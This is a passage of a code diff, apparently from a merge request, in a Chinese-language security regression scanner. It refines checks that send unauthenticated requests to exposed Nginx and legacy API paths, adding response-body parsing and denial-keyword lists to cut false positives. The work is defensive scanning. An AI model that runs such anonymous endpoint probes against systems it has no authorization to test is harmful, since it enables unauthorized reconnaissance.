results.append(VulnResult(
test_id="2.8.11",
name=f"Nginx外露端点已受限: {path}",
level=VulnResult.LEVEL_INFO,
description=f"基于Nginx配置分析,{path}({desc})虽然返回HTTP 200,但业务层已拒绝访问。",
request_info=f"GET {path}(无认证)",
response_info=f"HTTP {status_code} — 响应体已校验为权限拒绝",
is_vulnerable=False,
metadata={"is_regression": True, "vuln_source": "Nginx配置分析"},
))
continue
# 通过所有检查,确认存在漏洞
level = VulnResult.LEVEL_HIGH if severity == "high" else VulnResult.LEVEL_MEDIUM level = VulnResult.LEVEL_HIGH if severity == "high" else VulnResult.LEVEL_MEDIUM
results.append(VulnResult( results.append(VulnResult(
test_id="2.8.11", test_id="2.8.11",
...@@ -1256,7 +1316,7 @@ def _test_2_8_11(client): ...@@ -1256,7 +1316,7 @@ def _test_2_8_11(client):
level=level, level=level,
description=f"基于Nginx配置分析,{path}({desc})无需认证即可访问(HTTP 200),该端点不应在生产环境暴露。", description=f"基于Nginx配置分析,{path}({desc})无需认证即可访问(HTTP 200),该端点不应在生产环境暴露。",
request_info=f"GET {path}(无认证)", request_info=f"GET {path}(无认证)",
response_info=f"HTTP {status_code}", response_info=f"HTTP {status_code} — 响应体预览: {response_body_preview}",
is_vulnerable=True, is_vulnerable=True,
fix_suggestion=f"在Nginx配置中限制 {path} 路径的访问,或设置IP白名单仅允许内网访问。", fix_suggestion=f"在Nginx配置中限制 {path} 路径的访问,或设置IP白名单仅允许内网访问。",
metadata={"is_regression": True, "vuln_source": "Nginx配置分析"}, metadata={"is_regression": True, "vuln_source": "Nginx配置分析"},
......
...@@ -1068,6 +1068,95 @@ def _test_2098_legacy_api_detection(client): ...@@ -1068,6 +1068,95 @@ def _test_2098_legacy_api_detection(client):
status_code = resp.status_code if resp else 0 status_code = resp.status_code if resp else 0
if status_code == 200: if status_code == 200:
# 增加响应体验证:检查是否为权限拒绝或业务错误
is_auth_denied = False
response_body = ""
try:
data = resp.json()
response_body = resp.text[:500]
# 1. 检查 success 字段(兼容 success: false 和 success: 0)
if 'success' in data and not data['success']:
is_auth_denied = True
# 2. 检查业务错误码
code = data.get('code', data.get('status', data.get('errcode')))
if code is not None:
auth_denied_codes = (
'401', '403', '40301', '40101',
'B0027', 'B0017', 'B0002',
)
if str(code) in auth_denied_codes:
is_auth_denied = True
# 3. 检查 message/msg 中的拒绝关键词
message = str(data.get('message', data.get('msg', '')))
if message:
deny_keywords = [
'权限不足', '不允许访问', '拒绝访问',
'未授权', '请登录', '重新登录', '已退出',
'AccessDenied', '用户不存在',
]
if any(kw in message for kw in deny_keywords):
is_auth_denied = True
# 4. 检查接口方法不支持等非安全响应
code_val = str(data.get('code', data.get('status', '')))
msg_val = str(data.get('message', data.get('msg', '')))
not_supported_keywords = [
'not supported', '不支持', 'Method Not Allowed',
'method not supported',
]
if any(kw.lower() in msg_val.lower() for kw in not_supported_keywords):
is_auth_denied = True
if any(kw.lower() in code_val.lower() for kw in not_supported_keywords):
is_auth_denied = True
# 5. 检查运维集控特殊响应格式
if 'success' in data and data.get('success') == 0:
error_data = data.get('data', [])
if isinstance(error_data, list) and error_data:
error_msg = str(error_data[0].get('error', ''))
if '用户不存在' in error_msg or '重新登录' in error_msg:
is_auth_denied = True
except (ValueError, AttributeError):
# 非 JSON 响应(如 HTML 页面)
response_body = resp.text[:500] if resp else ""
# 检查是否为HTML登录页面或SPA前端兜底页面(不是漏洞)
body_lower = response_body.lower()
# 前端SPA入口页面特征:referrer=never/no-referrer + no-cache
spa_indicators = [
'content=never', 'content=no-referrer',
]
cache_indicators = [
'no-cache', 'must-revalidate',
]
has_spa_ref = any(ind in body_lower for ind in spa_indicators)
has_cache_meta = any(ind in body_lower for ind in cache_indicators)
if has_spa_ref and has_cache_meta:
is_auth_denied = True
# 也检查传统登录页面
login_indicators = ['login', '登录', 'signin', '请登录']
if any(ind in body_lower for ind in login_indicators):
is_auth_denied = True
if is_auth_denied:
# 权限拒绝或业务错误,不是漏洞
log.debug(f" {path} 返回 200 但业务拒绝 — {desc}")
results.append(VulnResult(
test_id="2.9.8",
name=f"历史漏洞路径已受限: {path}",
level=VulnResult.LEVEL_INFO,
description=f"基于历史漏洞回归测试,{path}({desc})虽然返回HTTP 200,但业务层已拒绝访问。来源: {source}",
request_info=f"GET {path}(无认证)",
response_info=f"HTTP {status_code} — 响应体已校验为权限拒绝",
is_vulnerable=False,
metadata={"is_regression": True, "vuln_source": source},
))
continue
# 通过所有检查,确认存在漏洞
level = VulnResult.LEVEL_HIGH if severity == "high" else VulnResult.LEVEL_MEDIUM level = VulnResult.LEVEL_HIGH if severity == "high" else VulnResult.LEVEL_MEDIUM
results.append(VulnResult( results.append(VulnResult(
test_id="2.9.8", test_id="2.9.8",
...@@ -1075,7 +1164,7 @@ def _test_2098_legacy_api_detection(client): ...@@ -1075,7 +1164,7 @@ def _test_2098_legacy_api_detection(client):
level=level, level=level,
description=f"基于历史漏洞回归测试,{path}({desc})仍可匿名访问(HTTP 200)。来源: {source}", description=f"基于历史漏洞回归测试,{path}({desc})仍可匿名访问(HTTP 200)。来源: {source}",
request_info=f"GET {path}(无认证)", request_info=f"GET {path}(无认证)",
response_info=f"HTTP {status_code}", response_info=f"HTTP {status_code} — 响应体: {_truncate_text(response_body, 300)}",
is_vulnerable=True, is_vulnerable=True,
fix_suggestion=f"下线或限制 {path} 路径的访问。", fix_suggestion=f"下线或限制 {path} 路径的访问。",
metadata={"is_regression": True, "vuln_source": source}, metadata={"is_regression": True, "vuln_source": source},
......
Markdown 格式
0%
您添加了 0 到此讨论。请谨慎行事。
请先完成此评论的编辑!
注册 或者 后发表评论